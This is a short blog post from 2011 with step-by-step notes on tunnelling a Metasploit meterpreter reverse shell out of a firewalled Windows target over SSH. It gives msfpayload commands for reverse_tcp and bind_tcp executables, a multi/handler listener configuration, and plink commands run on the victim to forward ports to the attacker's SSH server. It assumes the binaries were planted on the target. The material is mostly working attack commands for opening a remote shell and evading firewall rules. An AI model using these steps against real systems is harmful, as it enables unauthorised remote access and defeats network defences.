Quick notes – Get a meterpreter reverse shell through SSH tunnel

12/03/2011 § Leave a comment


Let’s say you are able to upload binaries to your target machine (via webshell, black magic, or bribes).

When you try to upload your meterpreter payload and runs it the firewall kills your session.

Below is a nice trick that you can pull in order to bypass evil firewalls or restrictive rules (keep in mind that sometimes you may need to change the port of your SSH server from 22 to something like 80 or 443).

In my humble opinion, meterpreter shells should never be dropped.

# Linux Backtrack 5 R1 (attacker machine) 

  1. Fire up your SSH server
  2. Generate your meterpreter payload :
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /path/msf.exe
  1. Drop msf.exe on your target
  2. Drop plink.exe on your target (plink version from quest putty)
  3. Set up a msf handler
color false
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set lport 4444
set exitonsession false
exploit -j
  • Note: Use instead of (otherwise you will have a lot of problems)

On Mac you will have to set up an alias for lo interface:

# ifconfig lo0 alias

# Windows (target machine)

  1. Connecting to the ssh server and setting up a port forwarding:
plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -L
  1. Start msf.exe

You should get a meterpreter reverse shell.


Resilient SSH Tunneled Meterpreter Sessionhttp://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html

Quest PuTTYhttp://rc.quest.com/topics/putty/readme/#plinkopt

Dirty notes:


# I had issues with reverse_https, so I highly recommend reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /path/msfrev.exe

## target ###

plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -L



msfpayload windows/meterpreter/bind_tcp RHOST= LPORT=4444 X > /path/msfbind.exe


plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -R

Where Am I?

You are currently browsing the Metasploit category at hdesser.